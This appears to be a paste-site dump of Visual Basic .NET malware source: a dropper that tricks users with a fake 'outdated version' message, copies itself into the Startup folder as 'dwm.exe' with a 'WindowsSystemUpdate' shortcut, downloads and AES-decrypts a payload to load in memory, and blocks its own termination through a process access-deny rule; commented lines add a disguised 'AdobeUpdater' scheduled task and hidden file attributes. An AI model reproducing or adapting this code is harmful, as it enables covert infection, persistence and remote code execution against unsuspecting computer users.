

Feb 13th, 2017
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  1. Imports System.IO
  2. Imports System.Security.Cryptography
  3. Imports System.Text
  4. Imports System.Net
  5. Imports System.ComponentModel
  6. Imports System.Security.AccessControl
  7. Imports System.Runtime.InteropServices
  8. Imports System.Security.Principal
  9. '### Cod3d by skype > el30n4d0
  10. Public Class Form1
  11. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  12. Dim path As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
  13. Dim path2 As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\dwm.exe"
  14. If IO.File.Exists(path2) = True Then
  16. Else : MsgBox("The version of your software is outdated. Please download the new version", MsgBoxStyle.Information, "Outdated Version")
  17. Dim aFile As String = Application.ExecutablePath
  18. Dim Split() As String = aFile.Split("/")
  19. Dim Filename As String = "dwm.exe"
  20. System.IO.File.Copy(aFile, path & "/" & Filename)
  21. End If
  22. CreateShortCut(Application.ExecutablePath, path, "WindowsSystemUpdate")
  25. '#####################################
  26. 'Shell("schtasks /Create /SC minute /MO 5 /TN AdobeUpdater /TR " & Application.ExecutablePath, AppWinStyle.Hide)
  28. ' IO.File.SetAttributes(Application.ExecutablePath, IO.FileAttributes.Hidden + IO.FileAttributes.System)
  29. ' Dim c_NewAntiKill As New c_AntiKill
  30. ' c_NewAntiKill.c_ImAntiKill()
  31. ' qweppaksdkpqwkpdpkasdqwdasd()
  32. '###############################3
  33. End Sub
  34. Private Function CreateShortCut(ByVal TargetName As String, ByVal ShortCutPath As String, ByVal ShortCutName As String) As Boolean
  35. Dim oShell As Object
  36. Dim oLink As Object
  37. 'you don’t need to import anything in the project reference to create the Shell Object
  39. Try
  41. oShell = CreateObject("WScript.Shell")
  42. oLink = oShell.CreateShortcut(ShortCutPath & "\" & ShortCutName & ".lnk")
  43. ' oShell.iconLocation = "%SystemRoot%\system32\SheLL32.dll,8"
  44. oLink.iconLocation = "%SystemRoot%\system32\SheLL32.dll,12"
  45. oLink.TargetPath = TargetName
  46. oLink.WindowStyle = 1
  47. oLink.Save()
  48. Catch ex As Exception
  50. End Try
  52. End Function
  53. 'Private Sub LNKSTART(ByVal PSH As String)
  54. ' Dim CWS As Object = CreateObject("WScript.Shell")
  55. ' Dim SSH, SF
  56. ' SF = CWS.SpecialFolders("Startup")
  57. ' SSH = CWS.CreateShortcut(SF & "\" & PSH & ".lnk")
  58. ' SSH.TargetPath = CWS.ExpandEnvironmentStrings(PSH)
  59. ' SSH.WindowStyle = 4
  60. ' SSH.IconLocation = "%SystemRoot%\system32\SheLL32.dll,8"
  61. ' SSH.Save()
  62. 'End Sub
  63. Function qweppaksdkpqwkpdpkasdqwdasd()
  64. Dim Download As New WebClient()
  65. Dim strings As String = Download.DownloadString("")
  66. Dim Base64 As Byte() = Convert.FromBase64String(AES(strings, "EAAAACEnFZ0wDsAgFz54T6xjtltmv4+T+egwCvXXqgN5VJ1L"))
  67. Dim Load As Object = Interaction.CallByName(AppDomain.CurrentDomain, AES("EAAAAKZ0Dv9XU5KCiha4Th4IEe3E/domsR49MblFHGLANgCI", "123212321232123212321232121"), CallType.Method, Base64)
  68. Dim EntryPoint As Object = Interaction.CallByName(Load, AES("EAAAACEnFZ0wDsAgFz54T6xjtltmv4+T+egwCvXXqgN5VJ1L", "123212321232123212321232121"), CallType.[Get])
  69. Dim invoke As Object = Interaction.CallByName(EntryPoint, AES("EAAAAGzRBSsnW2pXXjjnKn+GxH0X+MPJH/qqLIWaU3P8sHDL", "123212321232123212321232121"), CallType.Method, Nothing, Nothing)
  71. End Function
  72. Private Shared E0 As Byte() = Encoding.ASCII.GetBytes("o6806642kbM7c5")
  73. Public Shared Function AES(E00 As String, E000 As String) As String
  74. If String.IsNullOrEmpty(E00) Then
  75. Throw New ArgumentNullException("cipherText")
  76. End If
  77. If String.IsNullOrEmpty(E000) Then
  78. Throw New ArgumentNullException("sharedSecret")
  79. End If
  80. Dim E1 As RijndaelManaged = Nothing
  81. Dim E2 As String = Nothing
  82. Try
  83. Dim E22 As New Rfc2898DeriveBytes(E000, E0)
  84. Dim E11 As Byte() = Convert.FromBase64String(E00)
  85. Using msDecrypt As New MemoryStream(E11)
  86. E1 = New RijndaelManaged()
  87. E1.Key = E22.GetBytes(E1.KeySize / 8)
  88. E1.IV = E4(msDecrypt)
  89. Dim E3 As ICryptoTransform = E1.CreateDecryptor(E1.Key, E1.IV)
  90. Using E33 As New CryptoStream(msDecrypt, E3, CryptoStreamMode.Read)
  91. Using E333 As New StreamReader(E33)
  92. E2 = E333.ReadToEnd()
  93. End Using
  94. End Using
  95. End Using
  96. Finally
  97. If E1 IsNot Nothing Then
  98. E1.Clear()
  99. End If
  100. End Try
  102. Return E2
  103. End Function
  104. Private Shared Function E4(E44 As Stream) As Byte()
  105. Dim E5 As Byte() = New Byte(4 - 1) {}
  106. If E44.Read(E5, 0, E5.Length) <> E5.Length Then
  107. Throw New SystemException("Stream did not contain properly formatted byte array")
  108. End If
  110. Dim E55 As Byte() = New Byte(BitConverter.ToInt32(E5, 0) - 1) {}
  111. If E44.Read(E55, 0, E55.Length) <> E55.Length Then
  112. Throw New SystemException("Did not read byte array properly")
  113. End If
  115. Return E55
  116. End Function
  117. Public Class c_AntiKill
  118. <DllImport("advapi32.dll", SetLastError:=True)> _
  119. Shared Function GetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer, <Out> pSecurityDescriptor As Byte(), nLength As UInteger, ByRef lpnLengthNeeded As UInteger) As Boolean
  120. End Function
  121. <DllImport("advapi32.dll", SetLastError:=True)> _
  122. Shared Function SetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer, <[In]> pSecurityDescriptor As Byte()) As Boolean
  123. End Function
  124. <DllImport("kernel32.dll")> _
  125. Shared Function GetCurrentProcess() As IntPtr
  126. End Function
  127. Protected Function GetProcessSecurityDescriptor(processHandle As IntPtr) As RawSecurityDescriptor
  128. Dim psd() As Byte = New Byte(1) {}
  129. Dim bufSizeNeeded As UInteger
  130. GetKernelObjectSecurity(processHandle, &H4, psd, 0, bufSizeNeeded)
  131. psd = New Byte(bufSizeNeeded) {}
  132. If bufSizeNeeded < 0 OrElse bufSizeNeeded > Short.MaxValue Then
  133. Throw New Win32Exception()
  134. End If
  135. If Not GetKernelObjectSecurity(processHandle, &H4, psd, bufSizeNeeded, bufSizeNeeded) Then
  136. Throw New Win32Exception()
  137. End If
  138. Return New RawSecurityDescriptor(psd, 0)
  139. End Function
  140. Protected Sub SetProcessSecurityDescriptor(processHandle As IntPtr, dacl As RawSecurityDescriptor)
  141. Dim rawsd As Byte() = New Byte(dacl.BinaryLength - 1) {}
  142. dacl.GetBinaryForm(rawsd, 0)
  143. If Not SetKernelObjectSecurity(processHandle, &H4, rawsd) Then
  144. Throw New Win32Exception()
  145. End If
  146. End Sub
  147. Public Sub c_ImAntiKill()
  148. Dim hProcess As IntPtr = GetCurrentProcess()
  149. Dim dacl = GetProcessSecurityDescriptor(hProcess)
  150. dacl.DiscretionaryAcl.InsertAce(0, New CommonAce(AceFlags.None, AceQualifier.AccessDenied, CInt(&HF0000 Or &H100000 Or &HFFF), New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing), False, Nothing))
  151. SetProcessSecurityDescriptor(hProcess, dacl)
  152. End Sub
  153. End Class
  155. Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles MyBase.FormClosing
  156. ' Application.Restart()
  157. End Sub
  158. End Class
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